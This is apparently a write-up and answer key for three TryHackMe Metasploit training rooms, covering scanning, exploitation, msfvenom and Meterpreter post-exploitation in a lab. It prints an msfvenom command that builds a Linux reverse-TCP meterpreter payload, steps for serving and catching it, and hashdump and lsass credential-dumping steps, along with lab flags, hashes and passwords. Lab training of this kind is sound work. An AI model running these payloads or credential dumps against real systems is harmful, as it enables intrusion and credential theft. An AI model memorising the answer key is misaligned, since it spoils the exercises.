TryHackMe — Jr Penetration Tester — Metasploit
Room 1- Metasploit: Introduction
Task 1 Introduction to Metasploit
Read only task!!
Task 2 Main Components of Metasploit
Answer the questions below
Q 1. What is the name of the code taking advantage of a flaw on the target system?
Ans. Exploit
Q 2. What is the name of the code that runs on the target system to achieve the attacker’s goal?
Ans. Payload
Q 3. What are self-contained payloads called?
Ans. Singles
Q 4. Is “windows/x64/pingback_reverse_tcp” among singles or staged payload?
Ans. Singles
Task 3 Msfconsole
Answer the questions below
Q 1. How would you search for a module related to Apache?
Ans. search apache
Q 2. Who provided the auxiliary/scanner/ssh/ssh_login module?
Ans. todb
Task 4 Working with modules
Answer the questions below
Q 1. How would you set the LPORT value to 6666?
Ans. set LPORT 6666
Q 2. How would you set the global value for RHOSTS to 10.10.19.23 ?
Ans. setg RHOSTS 10.10.19.23
Q 3. What command would you use to clear a set payload?
Ans. unset PAYLOAD
Q 4. What command do you use to proceed with the exploitation phase?
Ans. exploit
Room — 2 Metasploit: Exploitation
Task 1 Introduction
Read Only Task!!
Task 2 Scanning
Answer the questions below
Q 1.How many ports are open on the target system?
Ans. 5
Q 2. Using the relevant scanner, what NetBIOS name can you see?
Ans. ACME IT SUPPORT
Q 3. What is running on port 8000?
Ans. webfs/1.21
Q 4. What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.
Ans. leo1234
Task 3 The Metasploit Database
Read Only Task!!
Task 4 Vulnerability Scanning
Q 1. Who wrote the module that allows us to check SMTP servers for open relay?
Ans. Campbell Murray
Task 5 Exploitation
Q 1. What is the content of the flag.txt file?
Ans. THM-5455554845
Ennumaration: — Run Nmap to check open services.
to find open vulnerability = nmap -p445 — script vuln <target>
Search payload and let’s try with reverse shell
After selecting payload set RHOST to targeet IP and run exploit and we got Windows CMD access
After digging into directories we found the flad.txt.
Q2. What is the NTLM hash of the password of the user “pirate”?
Ans. 8ce9a3ebd1647fcc5e04025019f4b875
use search hashdump
run post/windows/gather/hashdump
Task 6 Msfvenom
Q 1. What is the other user’s password hash?
Ans. 6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
Steps: — Creating a meterpreter payload in the .elf format
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.78.250 LPORT=4444 -f elf > rev_shell.elf
Now run http server using python http.server to transfer payload to target machine
We will use Multi Handler to receive the incoming connection. The module can be used with the use exploit/multi/handler
command.
Once everything is set, we will run
the handler and wait for the incoming connection.
Now run uploaded reverse shell payload on target machine to get meterpreter session
to get password hash run post/linux/gather/hashdump
Task 7 Summary
Read Only Task!!
Room — 3 Metasploit: Meterpreter
Task 1 Introduction to Meterpreter
Read only Task!!
Task 2 Meterpreter Flavors
Read only Task!!
Task 3 Meterpreter Commands
Read only Task!!
Task 4 Post-Exploitation with Meterpreter
Read only Task!!
Task 5 Post-Exploitation Challenge
Statement : — The questions below will help you have a better understanding of how Meterpreter can be used in post-exploitation.
You can use the credentials below to simulate an initial compromise over SMB (Server Message Block) (using exploit/windows/smb/psexec)
Username: ballen
Password: Password1
Solution :-
“use exploit/windows/smb/psexec” in metasploit
Set RHOST <Target_Machine_IP>, SMBuser and SMBpass (Make sure payload is selected to windows/meterpreter/reverse_tcp and listener is running in background)
After explioting we will get meterprater
Answer the questions below
Q 1 . What is the computer name?
Ans. ACME-TEST
Q 2. What is the target domain?
Ans. FLASH
Q 3. What is the name of the share likely created by the user?
Ans. speedster
Background the meterpreter session using command ‘background’
use module ‘post/windows/gather/enum_shares’
set session i_d to running background session i’d
then run the module
Q 4. What is the NTLM hash of the jchambers user?
Ans. 69596c7aa1e8daee17f8e78870e25a5c
migrate to lsass.ese (Local Security Authority Subsystem Service)
Q 5. What is the cleartext password of the jchambers user?
Ans. Trustno1
Q 6. Where is the “secrets.txt” file located?
Ans. c:\Program Files (x86)\Windows Multimedia Platform
Q 7. What is the Twitter password revealed in the “secrets.txt” file?
Ans. KDSvbsw3849!
Q 7. Where is the “realsecret.txt” file located?
Ans. c:\inetpub\wwwroot\
Q 8. What is the real secret?
Ans. The Flash is the fastest man alive